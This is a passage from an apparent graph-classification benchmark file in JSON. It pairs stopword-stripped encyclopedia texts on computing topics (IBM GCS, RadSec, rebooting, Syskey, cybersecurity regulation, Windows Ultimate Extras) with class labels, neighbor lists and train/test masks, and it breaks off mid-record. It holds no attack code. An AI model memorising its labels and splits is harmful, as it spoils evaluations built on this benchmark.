    "text": "Group_Control_System:group control system group control system gcs operating system made ibm meant run guest vm gcs integral component discontinued vm/sp since vm/sp 4 vm/xa sp vm/esa current z/vm ibm system product offerings gcs purpose provide environment run specific os/mvs-based applications networking middleware vm end gcs provides limited simulation os/mvs apis cms usual vm guest already os simulation extensive enough run applications vtam specifically gcs provides os multitasking support order able spread load several virtual machines gcs also implements notion group group member virtual machine interact one another implement gcs uses several techniques gcs designed multi-purpose user operating system cms example allow file editing examples programs designed run gcs",
    "neighbors": [
      10883,
      6148,
      7053,
      8077,
      9361,
      9619,
      9468,
      789,
      5397,
      11673,
      9370,
      6557,
      3359,
      10273,
      421,
      7848,
      2345,
      6442,
      7983,
      8879,
      7217,
      9139,
      10803,
      7477,
      7733,
      10040,
      8122,
      573,
      8509,
      1219,
      964,
      8388,
      6342,
      1235,
      7507,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      6248,
      5492,
      375,
      2168,
      3323,
      2172,
      2813,
      4862,
      8063
    ],
    "mask": "None"
  },
  {
    "node_id": 4997,
    "label": 2,
    "text": "Jim_Jagielski:jim jagielski jim jagielski born march 11 1961 american software engineer specializes web cloud open source technologies jagielski graduated johns hopkins university 1983 bes electrical/computer engineering hired nasa goddard space flight center immediately graduation 1994 jagielski founded jagunet access services web host isp served cto zend technologies cto covalent technologies chief architect springsource/vmware office cto red hat inc. consulting software engineer sr. director capital one tech fellows program currently open source chef consensys speaker various conferences seminars apachecon forrester gigaworld o'reilly open source convention written numerous topics editor apache section slashdot best known cofounder member director apache software foundation asf core developer several asf projects including apache http server apache portable runtime apache tomcat first recognition internet editor a/ux faq system administrator jagubox primary repository third-party software apple a/ux operating system addition involvement asf jagielski involved open-source projects jagielski one founding members apache software foundation member original eight-member apache group jagielski served director asf board incorporation 1999 2018 making longest serving director foundation history served eight years executive vice president secretary three years chairman jagielski served several years president asf jagielski original chair apache incubator project still involved one original co-mentors geronimo project also mentors several incubator podlings jagielski active developer many open source projects asf otherwise development ncsa httpd web server started apache early-to-mid 1995 making likely longest active contributor within asf 2005 jagielski asked serve advisory board open source software institute open source software institute ossi non-profit 501 c 6 organization corporate government academic representatives mission promote development implementation open-source software solutions within u.s. federal state municipal government agencies academic entities 2010 jagielski appointed board directors codeplex foundation later renamed outercurve foundation well director jagielski serves president outercurve 2011 jagielski appointed board directors open source initiative resigned september 2013 based long involvement foss community jagielski one recipients o'reilly open source awards oscon 2012 2012 jagielski appointed new council member marsec-xl foundation 2015 jagielski awarded european commission/open innovation strategy policy group luminary award creating open engagement platforms global efforts promoting open source innovation process jagielski contributed sendmail xntpd bind php perl freebsd among projects",
    "neighbors": [
      865,
      4194,
      8644,
      4837,
      8582,
      3241,
      3986,
      1363
    ],
    "mask": "Test"
  },
  {
    "node_id": 4998,
    "label": 9,
    "text": "System_programming_language:system programming language system programming language programming language used system programming languages designed writing system software usually requires different development approaches compared application software system software computer software designed operate control computer hardware provide platform running application software system software includes software categories motherboard firmware components firmware chipset peripheral controllers sometimes cpu microcode architectures provide rich complex isa interpreted simple general purpose hardware circuits bios/uefi second stage boot loaders operating systems comprising essential always running services api exposed system libraries user applications interfaces kernel address space obviously kernel utilities system administration device drivers loaders dynamic linkers contrast application languages system programming languages typically offer more-direct access physical hardware machine archetypical system programming language sense bcpl system programming languages often lack built-in input/output i/o facilities system-software project usually develops i/o mechanisms builds top basic monitor i/o screen management facilities distinction languages used system programming application programming became blurred time widespread popularity pl/i c pascal earliest system software written assembly language primarily alternative also reasons including efficiency object code compilation time ease debugging application languages fortran used system programming although usually still required routines written assembly language mid-level languages much syntax facilities higher level language also provide direct access language well providing assembly language machine features earliest espol burroughs mainframes 1960 followed niklaus wirth pl360 initially written burroughs system cross compiler general syntax algol 60 whose statements directly manipulated cpu registers memory languages category include mol-360 pl/s example typical pl360 statement codice_1 signifying registers 8 7 and'ed together result shifted left 8 bits result or'ed contents register 6 final result placed register 9 pl360 semantic level assembly language another kind system programming language operates higher semantic level specific extensions designed make language suitable system programming early example kind language lrltran extended fortran features character bit manipulation pointers directly addressed jump tables subsequently languages c developed combination features sufficient write system software compiler could developed generated efficient object programs modest hardware language generally omits features implemented efficiently adds small number machine-dependent features needed access specific hardware capabilities inline assembly code c asm statement often used purpose although many languages developed c c++ ones survived system programming language spl also name specific language hp 3000 computer series used operating system hp multi-programming executive parts system software",
    "neighbors": [
      5634,
      7173,
      8582,
      8966,
      9224,
      3594,
      1552,
      8976,
      5397,
      9751,
      25,
      9245,
      8606,
      11295,
      3876,
      5803,
      428,
      5165,
      5677,
      5551,
      7983,
      9264,
      1715,
      8502,
      10680,
      58,
      1469,
      10176,
      837,
      1349,
      8262,
      10568,
      9931,
      8524,
      10703,
      7889,
      5714,
      11219,
      1236,
      6742,
      2647,
      2525,
      477,
      7775,
      6242,
      10470,
      6503,
      3816,
      10089,
      1515,
      5358,
      5363,
      6772,
      10739,
      3323,
      7292,
      2045,
      1278
    ],
    "mask": "Test"
  },
  {
    "node_id": 4999,
    "label": 5,
    "text": "RadSec:radsec radsec protocol transporting radius datagrams tcp tls radius protocol widely deployed authentication authorization protocol supplementary radius accounting specification also provides accounting mechanisms thus delivering full aaa protocol solution however radius experiencing two major shortcomings time passes since initial design dependency unreliable transport protocol udp lack security large parts packet payload specifically latter radius security based md5 algorithm proven insecure main focus radsec provide means secure communication radius/tcp peers transport layer important use radsec lies roaming environments radius packets need transferred different administrative domains untrusted potentially hostile networks example world-wide roaming environment uses radsec secure communication eduroam radius extensions working group internet engineering task force ietf specified radsec rfc 6614",
    "neighbors": [
      10058,
      10924,
      4053,
      11413
    ],
    "mask": "Test"
  },
  {
    "node_id": 5000,
    "label": 2,
    "text": "Reboot:reboot computing rebooting process running computer system restarted either intentionally unintentionally reboots either cold alternatively known hard power system physically turned back causing initial boot machine warm alternatively known soft system restarts without need interrupt power term restart used refer reboot operating system closes programs finalizes pending input output operations initiating soft reboot early electronic computers like ibm 1401 operating system little internal memory input often stack punch cards computer initiated pressing start button performed single command read card first card instructed machine read cards eventually loaded user program process likened old saying picking bootstraps referring horseman lifts ground pulling straps boots set initiating punch cards called bootstrap cards thus cold start called booting computer computer crashed rebooted boot reference carried subsequent types computers see bootstrapping technical sources describe two contrasting forms reboot known cold reboot also cold boot hard reboot hard boot warm reboot also soft reboot soft boot although definition forms vary slightly sources according jones landes tittel 2002 cooper 2002 tulloch 2002 soper 2004 ibm pc compatible platform cold boot boot process computer starts powerless state except tulloch 2002 also mention cold boot system performs power-on self-test post addition power switch cooper 2002 soper 2004 also state reset button present may commence cold reboot jones landes tittel 2002 contradicts assertion states reset button may commence either cold warm reboot depending system microsoft support article 102228 also confers although reset button designed perform cold reboot may disconnect power motherboard – state correspond cold boot definition given according jones landes tittel 2002 operating system third-party software initiate cold boot restart command windows 9x initiates cold reboot unless shift key held finding definition warm boot however challenge aforementioned sources indicate warm boot initiated pressing ctrl alt delete key combination except tulloch 2002 mention warm reboot perform post jones landes tittel 2002 specifies warm reboot occur bios must recipient key combination microsoft support article 102228 takes technical approach defines warm boot result invoking int 19h bios interrupt call ctrl alt delete key combination one way achieving according grimes 2001 malware may prevent subvert warm boot intercepting ctrl alt delete key combination prevent reaching bios windows nt family operating systems also reserves key combination use soper 2004 asserts windows restart command initiates warm boot thus contradicting jones landes tittel 2002 believe action performs cold boot linux family operating systems supports alternative warm boot linux kernel optional support kexec system call transfers execution new kernel skips hardware firmware reset entire process occurs independently system firmware kernel executed linux kernel outside domain ibm compatible pcs types boot may disambiguous according sue loh windows ce base team windows ce devices support three types boots warm cold clean warm boot discards program memory cold boot additionally discards storage memory also known object store clean boot erases forms memory storage device however since areas exist windows ce devices users concerned two forms reboot one resets volatile memory one wipes device clean restores factory settings example windows mobile 5.0 device former cold boot latter clean boot hard reboot means system shut orderly manner skipping file system synchronisation activities would occur orderly shutdown achieved either applying reset cycling power issuing command unix-like systems triggering kernel panic term restart used microsoft windows linux family operating systems denote operating system-assisted reboot restart operating system ensures pending i/o operations gracefully ended commencing reboot users may deliberately initiate reboot rationale action may include means performing deliberate reboot also vary may include unexpected loss power reason including power outage power supply failure depletion battery mobile device forces system user perform cold boot power restored bioses option automatically boot system power failure uninterruptible power supply ups backup battery redundant power supply prevent circumstances random reboot non-technical term referring unintended often undesired reboot following system crash whose root cause may immediately evident user crashes may occur due multitude software hardware problems triple faults generally symptomatic error ring 0 trapped error handler operating system hardware-triggered non-maskable interrupt systems may configured reboot automatically power failure fatal system error kernel panic method done varies depending whether reboot handled software must handled firmware hardware level operating systems windows nt family windows nt 3.1 windows 7 option modify behavior error handler computer immediately restarts rather displaying blue screen death bsod error message option enabled default editions introduction advanced power management allowed operating systems greater control hardware power management features advanced configuration power interface acpi newer operating systems able manage different power states thereby sleep and/or hibernate hibernation also involves turning system subsequently back operating system start scratch thereby differentiating process rebooting reboot may simulated software running operating system example sysinternals bluescreen utility used pranking modes bsod xscreensaver hack entertainment albeit possibly concerning first glance malware may also simulate reboot thereby deceive computer user nefarious purpose microsoft app-v sequencing tool captures file system operations installer order create virtualized software package users part sequencing process detect installer requires reboot interrupt triggered reboot instead simulate required reboot restarting services loading/unloading libraries windows 8 10 enable default hibernation-like fast startup a.k.a fast boot cause problems including confusion users accustomed turning computers cold reboot",
    "neighbors": [
      8447,
      11140,
      6797,
      8976,
      10130,
      8852,
      5397,
      3109,
      8997,
      7983,
      823,
      7739,
      4032,
      321,
      5312,
      9540,
      6601,
      7501,
      2383,
      10063,
      9557,
      7515,
      3807,
      6369,
      8418,
      4836,
      1515,
      3181,
      9197,
      1903,
      5105,
      6129,
      2811,
      1660,
      7678,
      639
    ],
    "mask": "Train"
  },
  {
    "node_id": 5001,
    "label": 3,
    "text": "4x4_Off-Road_Racing:4x4 off-road racing 4x4 off-road racing video game racing genre released 1988 epyx developed ogdan micro design inc four maps consist mud ice desert mountains compute called game enjoyable drive spanish magazine microhobby valued game following scores originality 50 graphics 50 motion 60 sound 50 difficulty 70 addiction 40",
    "neighbors": [
      10931,
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 5002,
    "label": 4,
    "text": "Cyber-security_regulation:cyber-security regulation cybersecurity regulation comprises directives safeguard information technology computer systems purpose forcing companies organizations protect systems information cyberattacks like viruses worms trojan horses phishing denial service dos attacks unauthorized access stealing intellectual property confidential information control system attacks numerous measures available prevent cyberattacks cybersecurity measures include firewalls anti-virus software intrusion detection prevention systems encryption login passwords attempts improve cybersecurity regulation collaborative efforts government private sector encourage voluntary improvements cybersecurity industry regulators including banking regulators taken notice risk cybersecurity either begun planned begin include cybersecurity aspect regulatory examinations 2011 dod released guidance called department defense strategy operating cyberspace articulated five goals treat cyberspace operational domain employ new defensive concepts protect dod networks systems partner agencies private sector pursuit whole-of-government cybersecurity strategy work international allies support collective cybersecurity support development cyber workforce capable rapid technological innovation march 2011 gao report identified protecting federal government information systems nation cyber critical infrastructure governmentwide high-risk area noting federal information security designated high-risk area since 1997 2003 systems protecting critical infrastructure called cyber critical infrastructure protection cyber cip also included november 2013 dod put forward new cybersecurity rule 78 fed reg 69373 imposed certain requirements contractors compliance certain nist standards mandatory reporting cybersecurity incidents dod flow-down clause applies requirements subcontractors june 2013 congressional report found 50 statutes relevant cybersecurity compliance federal information security management act 2002 fisma one key statutes governing federal cybersecurity regulations federal cybersecurity regulations ones exist focus specific industries three main cybersecurity regulations 1996 health insurance portability accountability act hipaa 1999 gramm-leach-bliley act 2002 homeland security act included federal information security management act fisma three regulations mandate healthcare organizations financial institutions federal agencies protect systems information example fisma applies every government agency requires development implementation mandatory policies principles standards guidelines information security however regulations address numerous computer related industries internet service providers isps software companies furthermore regulations specify cybersecurity measures must implemented require reasonable level security vague language regulations leaves much room interpretation bruce schneier founder cupertino counterpane internet security argues companies make sufficient investments cybersecurity unless government forces also states successful cyberattacks government systems still occur despite government efforts suggested data quality act already provides office management budget statutory authority implement critical infrastructure protection regulations administrative procedure act rulemaking process idea fully vetted would require additional legal analysis rulemaking could begin state governments attempted improve cybersecurity increasing public visibility firms weak security 2003 california passed notice security breach act requires company maintains personal information california citizens security breach must disclose details event personal information includes name social security number driver license number credit card number financial information several states followed california example passed similar security breach notification regulations security breach notification regulations punish firms cybersecurity failures giving freedom choose secure systems also regulation creates incentive companies voluntarily invest cybersecurity avoid potential loss reputation resulting economic loss come successful cyber attack 2004 california state legislature passed california assembly bill 1950 also applies businesses maintain personal information california residents regulation dictates businesses maintain reasonable level security required security practices also extend business partners regulation improvement federal standard expands number firms required maintain acceptable standard cybersecurity however like federal legislation requires reasonable level cybersecurity leaves much room interpretation case law established us congress proposed numerous bills expand upon cybersecurity regulation consumer data security notification act amends gramm-leach-bliley act require disclosure security breaches financial institutions congressmen also proposed expanding gramm-leach-bliley industries touch consumer financial information including firm accepts payment credit card congress proposed cybersecurity regulations similar california notice security breach act companies maintain personal information information protection security act requires data brokers ensure data accuracy confidentiality authenticate track users detect prevent unauthorized activity mitigate potential harm individuals addition requiring companies improve cybersecurity congress also considering bills criminalize cyberattacks securely protect cyber trespass act spy act bill type focused phishing spyware bill passed may 23 2005 us house representatives died us senate bill makes unlawful unauthorized usage computer take control modify setting collect induce owner disclose personally identifiable information install unsolicited software tamper security anti-spyware anti-virus software may 12 2011 us barack obama proposed package cybersecurity legislative reforms improve security us persons federal government critical infrastructure year public debate congress hearings followed resulting house representative passing information sharing bill senate developing compromise bill seeking balance national security privacy business interests july 2012 cybersecurity act 2012 proposed senators joseph lieberman susan collins bill would required creating voluntary best practice standards protection key infrastructure cyber attacks businesses would encouraged adopt incentives liability protection bill put vote senate failed pass obama voiced support act wall street journal op-ed also received support officials military national security including john o. brennan chief counterterrorism adviser white house according washington post experts said failure pass act may leave united states vulnerable widespread hacking serious cyberattack act opposed republican senators like john mccain concerned act would introduce regulations would effective could burden businesses senate vote republican senator kay bailey hutchison stated opposition bill partisan issue take right approach cybersecurity.the senate vote strictly along partisan lines six democrats voted five republicans voted critics bill included us chamber commerce advocacy groups like american civil liberties union electronic frontier foundation cybersecurity expert jody westby heritage foundation argued although government must act cybersecurity bill flawed approach represented intrusive federal role february 2013 obama proposed executive order improving critical infrastructure cybersecurity represents latest iteration policy considered law addressed congress yet seeks improve existing public-private partnerships enhancing timeliness information flow dhs critical infrastructure companies directs federal agencies share cyber threat intelligence warnings private sector entity identified target also tasks dhs improving process expedite security clearance processes applicable public private sector entities enable federal government share information appropriate sensitive classified levels directs development framework reduce cyber risks incorporating current industry best practices voluntary standards lastly tasks federal agencies involved incorporating privacy civil liberties protections line fair information practice principles january 2015 obama announced new cybersecurity legislative proposal proposal made effort prepare us expanding number cyber crimes proposal obama outlined three main efforts work towards secure cyberspace us first main effort emphasized importance enabling cybersecurity information sharing enabling proposal encouraged information sharing government private sector would allow government know main cyber threats private firms facing would allow government provide liability protection firms shared information furthermore would give government better idea us needs protected another main effort emphasized proposal modernize law enforcement authorities make equipped properly deal cyber crimes giving tools need order would also update classifications cyber crimes consequences one way would done would making crime overseas selling financial information another goal effort place cyber crimes prosecutable last major effort legislative proposal require businesses report data breaching consumers personal information sacrificed requiring companies consumers aware danger identity theft february 2016 obama developed cybersecurity national security action plan cnap plan made create long-term actions strategies effort protect us cyber threats focus plan inform public growing threat cyber crimes improve cybersecurity protections protects personal information americans inform americans control digital security one highlights plan include creating commission enhancing national cybersecurity goal create commission consists diverse group thinkers perspectives contribute make recommendations create stronger cybersecurity public private sector second highlight plan change government new government make secure put place third highlight plan give americans knowledge secure online accounts avoid theft personal information multi-factor authentication fourth highlight plan invest 35 money invested 2016 cybersecurity addition regulation federal government tried improve cybersecurity allocating resources research collaborating private sector write standards 2003 president national strategy secure cyberspace made department homeland security dhs responsible security recommendations researching national solutions plan calls cooperative efforts government industry create emergency response system cyber-attacks reduce nation vulnerability threats 2004 us congress allocated 4.7 billion toward cybersecurity achieving many goals stated president national strategy secure cyberspace industry security experts state president national strategy secure cyberspace good first step insufficient bruce schneier stated national strategy secure cyberspace n't secured anything yet however president national strategy clearly states purpose provide framework owners computer systems improve security rather government taking solving problem however companies participate collaborative efforts outlined strategy required adopt discovered security solutions united states us congress trying make information transparent cyber security act 2012 would created voluntary standards protecting vital infrastructure failed pass senate february 2013 white house issued executive order titled improving critical infrastructure cybersecurity allows executive branch share information threats companies individuals april 2013 house representatives passed cyber intelligence sharing protection act cispa calls protecting lawsuits aimed companies disclose breach information obama administration said might veto bill light hacking website indian space agency commercial arm 2015 antrix corporation government digital india programme cyberlaw expert advocate supreme court india pavan duggal stated dedicated cyber security legislation key requirement india sufficient merely put cyber security part act see cyber security sectoral perspective also national perspective cybersecurity standards great prominence today technology driven businesses maximize profits corporations leverage technology running operations internet since large number risks entail internetwork operations operations must protected comprehensive extensive regulations existing cybersecurity regulations cover different aspects business operations often vary region country business operates differences country society infrastructure values one overarching cyber security standard optimal decreasing risks us standards provide basis operations european union created tailored regulation businesses operating specifically within eu also light brexit important consider uk chosen adhere security regulations three major regulations within eu include enisa nis directive eu gdpr european union agency network information security enisa governing agency originally set regulation ec 460/2004 european parliament council 10 march 2004 purpose raising network information security nis internetwork operations eu enisa currently runs regulation eu 526/2013 replaced original regulation 2013 enisa works actively member states eu provide range services focus operations three factors enisa made management board relies support executive director permanent stakeholders group operations however run heads various departments enisa released various publications cover major issues cybersecurity enisa past current initiatives include eu cloud strategy open standards information communications technology cyber security strategy eu cyber security coordination group enisa also works collaboration existing international standard organizations like iso itu july 6 2016 european parliament set policy directive security network information systems nis directive directive went effect august 2016 member states european union given 21 months incorporate directive regulations national laws aim nis directive create overall higher level cybersecurity eu directive significantly affects digital service providers dsps operators essential services oess operators essential services include organizations whose operations would greatly affected case security breach engage critical societal economic activities dsps oes held accountable reporting major security incidents computer security incident response teams csirt dsps held stringent regulations operators essential services dsps set eu still operate eu still face regulations even dsps oes outsource maintenance information systems third parties nis directive still holds accountable security incidents member states eu required create nis directive strategy includes csirts addition national competent authorities ncas single points contact spocs resources given responsibility handling cybersecurity breaches way minimizes impact addition member states eu encouraged share cyber security information security requirements include technical measures manage risks cybersecurity breaches preventative manner dsp oes must provide information allows depth assessment information systems security policies significant incidents must notified csirts significant cybersecurity incidents determined number users affected security breach well longevity incident geographical reach incident eu general data protection regulation gdpr set place 14 april 2016 current date enforcement set 25 may 2018 gdpr aims bring single standard data protection among member states eu changes include redefining geographical borders applies entities operate eu deal data resident eu regardless data processed eu citizen data processed entity subject gdpr fines also much stringent gdpr total €20 million euros 4 entity annual turnover whichever higher addition like previous regulations data breaches effect rights freedoms individuals residing eu must disclosed within 72 hours overarching board eu data protection board edp charge oversight set gdpr consent plays major role gdpr companies hold data regards eu citizens must also offer right back sharing data easily consented sharing data addition citizens also restrict processing data stored choose allow companies store data process creates clear differentiation unlike previous regulations gdpr also restricts transfer citizen data outside eu third party without citizen prior consent proposed eprivacy regulation also planned applicable 25 may 2018 experts agree cybersecurity improvements necessary disagreement whether solution government regulation private-sector innovation many government officials cybersecurity experts believe private sector failed solve cybersecurity problem regulation needed richard clarke states industry responds threaten regulation industry respond threat follow believes software companies must forced produce secure programs bruce schneier also supports regulation encourages software companies write secure code economic incentives us representative rick boucher d–va proposes improving cybersecurity making software companies liable security flaws code addition improving software security clarke believes certain industries utilities isps require regulation hand many private-sector executives lobbyists believe regulation restrict ability improve cybersecurity harris miller lobbyist president information technology association america believes regulation inhibits innovation rick white former corporate attorney president ceo lobby group technet also opposes regulation states private-sector must continue able innovate adapt response new attack methods cyber space toward end commend president bush congress exercising regulatory restraint another reason many private-sector executives oppose regulation costly involves government oversight private enterprise firms concerned regulation reducing profits regulation limiting flexibility solve cybersecurity problem efficiently",
    "neighbors": [
      4099,
      10756,
      4489,
      11409,
      5780,
      150,
      8471,
      10392,
      1315,
      2213,
      7337,
      3629,
      4654,
      3759,
      4016,
      7345,
      9901,
      7739,
      4689,
      9426,
      11347,
      6360,
      7899,
      3552,
      5986,
      1251,
      4081,
      8824,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5003,
    "label": 2,
    "text": "Syskey:syskey sam lock tool better known syskey name executable file discontinued component windows nt encrypts security account manager sam database using 128-bit rc4 encryption key first introduced windows nt 4.0 sp3 removed windows 10 windows server 2016 due use cryptography considered insecure modern standards use part scams form ransomware microsoft officially recommended use bitlocker disk encryption alternative first introduced windows nt 4.0 sp3 syskey intended protect offline password cracking attacks preventing possessor unauthorized copy sam file extracting useful information syskey optionally configured require user enter key boot startup password load key onto removable storage media e.g. floppy disk usb flash drive october 2 2018 microsoft removed syskey.exe future versions windows microsoft recommends use bitlocker similar technologies instead syskey.exe utility december 1999 security team bindview found security hole syskey indicated certain form offline cryptanalytic attack possible making brute force attack appear possible microsoft later issued fix problem dubbed syskey bug bug affected windows nt 4.0 pre-rc3 versions windows 2000 syskey commonly abused tech support scammers lock victims computers order coerce paying ransom",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      3629,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      8299,
      622,
      9839,
      4210,
      7794,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      1671,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      2811,
      1791,
      8959,
      11519,
      6916,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      2901,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      9089,
      1418,
      5004,
      8080,
      1941,
      4505,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      1970,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 5004,
    "label": 2,
    "text": "Windows_Ultimate_Extras:windows ultimate extras windows ultimate extras optional features offered microsoft users ultimate edition windows vista accessible via windows update ultimate extras replaced market role microsoft plus product sold prior consumer releases microsoft windows according microsoft barry goffe company goal ultimate extras delight customers purchased ultimate edition windows vista expensive retail edition operating system windows ultimate extras discontinued windows 7 operating system also removes installed extras upgrade windows vista ultimate microsoft released total nine ultimate extras users windows vista ultimate bitlocker drive preparation tool utility secure online key backup utility among first ultimate extras made available released coincide general retail availability windows vista bitlocker drive preparation tool prepares hard drive encrypted bitlocker whereas secure online key backup enabled users create off-site backup bitlocker recovery password encrypting file system recovery certificates digital locker part windows marketplace digital distribution platform secure online key backup rendered inoperable digital locker shut august 2009 unlike previous versions windows windows vista language-independent language architecture separates language resources user interface binary code operating system support installing additional languages included enterprise ultimate editions windows vista ultimate edition functionality made available windows update ultimate extras microsoft stated 16 languages made available january 30 2007 company released remaining language packs october 23 2007 total 35 language packs additional 36th language pack version available windows vista supports traditional chinese characters hong kong encoding character set microsoft tinker puzzle game players must navigate robot mazes obstacles total 60 levels included players create levels level editor hold 'em poker card game released january 29 2007 fundamentally similar texas hold 'em hold 'em allows users play five computer players three levels difficulty also allows users customize aspects game appearance game relies directx produce hardware-accelerated 3d animations effects optimal performance hold 'em requires computer windows experience index rating 2.0 higher according paul thurrott hold 'em originally intended bundled alongside premium games— chess titans mahjong titans inkball —included default home premium ultimate editions windows vista instead made ultimate extra gambling themes total three sound schemes windows vista released ultimate extras glass ultimate extras pearl microsoft tinker first two made available april 22 2008 latter made available day microsoft tinker glass pearl sound schemes similar default sound scheme included windows vista also developed accordance design language principles windows aero graphical user interface windows dreamscene utility enables mpeg wmv videos displayed desktop backgrounds dreamscene requires windows aero graphical user interface enabled order function feature relies desktop window manager display videos desktop additional extras also proposed released including podcast creation application game performance optimization utility custom themes exclusive access online content services windows movie maker effects transitions templates windows dvd maker digital publications group shot photo manipulation application developed microsoft research shown bill gates consumer electronics show 2007 although considered ultimate extras company ultimate extras team also released two wallpapers users windows vista ultimate titled start strands wallpapers based design windows vista ultimate retail packaging made available three different display resolutions reaction windows ultimate extras mixed microsoft praised creating value proposition users purchased expensive edition windows vista company criticized delays delivery updates perceived lack quality delivered updates lack transparency regarding development early concerns features would live users expectations company announced several ultimate extras january 2007 fraction released five months later months without official update since january microsoft released apology delays stating intended ship remaining features end summer 2007 delays consecutive updates months silence led speculation development team within company responsible features quietly disbanded microsoft announced intentions release remaining ultimate extras released apology delays paul thurrott stated company dropped ball features ed bott wrote ultimate extras probably biggest mistake microsoft made vista company would downplay ultimate edition windows 7 result bott would later list among decade worth windows mistakes microsoft also criticized changing description ultimate extras within operating system offerings slated made available initially described cutting-edge programs innovative services unique publications description features within control panel applet later modified windows vista service pack 1 modest interpreted attempt made company avoid fulfilling prior expectations emil protalinski ars technica wrote ultimate edition windows vista would looked fine without joke 'ultimate extras features supposed provide incentive consumers purchase edition give critics something point laugh second part review windows 7 peter bright ars technica wrote value proposition ultimate extras nothing short piss-poor bright would later criticize microsoft decision release internet explorer 10 windows vista would go state still bad ultimate extras farce",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      6171,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      617,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      3773,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      740,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      3366,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      3394,
      3922,
      11605,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      6114,
      6115,
      488,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 5005,
    "label": 3,
    "text": "Enterprise_interoperability_framework:enterprise interoperability framework enterprise interoperability framework used guideline collecting structuring knowledge/solution enterprise interoperability framework defines domain sub-domains interoperability research development order identify set pieces knowledge solving enterprise interoperability problems removing barriers interoperability existing works interoperability carried define interoperability framework reference models particular lisi reference model european interoperability framework eif ideas interoperability framework athena interoperability framework e-health interoperability framework existing approaches constitute basis enterprise interoperability framework necessity elaborate enterprise interoperability framework discussed existing interoperability frameworks explicitly address barriers interoperability basic assumption research aimed structuring interoperability knowledge respect ability remove various barriers enterprise interoperability framework three basic dimensions framework three basic dimensions shown enterprise interoperability framework allows enterprise interoperability framework aims structuring concepts defining research domain capturing knowledge also helping industries solve interoperability problems carrying interoperability project involving two particular enterprises interoperability concerns interoperability barriers two enterprises identified first mapped enterprise interoperability framework using framework existing interoperability degree characterised targeted interoperability degree defined objective meet knowledge/solutions associated barriers concerns searched framework solutions found proposed users possible adaptation and/or combination solutions remove identified barriers required interoperability established",
    "neighbors": [
      7897,
      7636,
      2948,
      11367
    ],
    "mask": "Test"
  },
  {
    "node_id": 5006,
    "label": 2,
    "text": "Linux_Technology_Center:linux technology center ibm linux technology center ltc organization focused development linux kernel related open-source software projects 1999 ibm created ltc combine software developers interested linux open-source software single organization much ltc early effort focused making server platforms linux friendly ltc collaborated linux community make linux run optimally processor architectures x86 mainframe powerpc power isa recent years focus ltc expanded include several open source initiatives developers ltc contribute various open-source projects ltc worldwide team main locations australia brazil china germany india israel united states",
    "neighbors": [
      10757,
      6157,
      4630,
      4255,
      9633,
      3493,
      6311,
      10413,
      5172,
      9397,
      823,
      10040,
      3771,
      6850,
      5450,
      8792,
      859,
      10985,
      9455,
      499,
      8439,
      3960,
      3323,
      8700,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 5007,
    "label": 4,
    "text": "Medical_data_breach:medical data breach medical data breach data breach health information could include either personal health information individual electronic health record medical billing information health insurance united states rate breaches increased time 176 million records breached end 2017 february 2015 npr report claimed organized crime networks ways selling health data black market 2015 beazley group staffperson estimated medical records could sell black market -50 crime primary cause medical data breaches theft data loss hacking unauthorized account access ways medical data breaches happen among reported breaches medical information united states networked information systems accounted largest number records breached united states health insurance portability accountability act health information technology economic clinical health act require companies report data breaches affected individuals federal government",
    "neighbors": [
      11347,
      1251,
      2558,
      8471
    ],
    "mask": "None"
  },
  {
    "node_id": 5008,
    "label": 2,
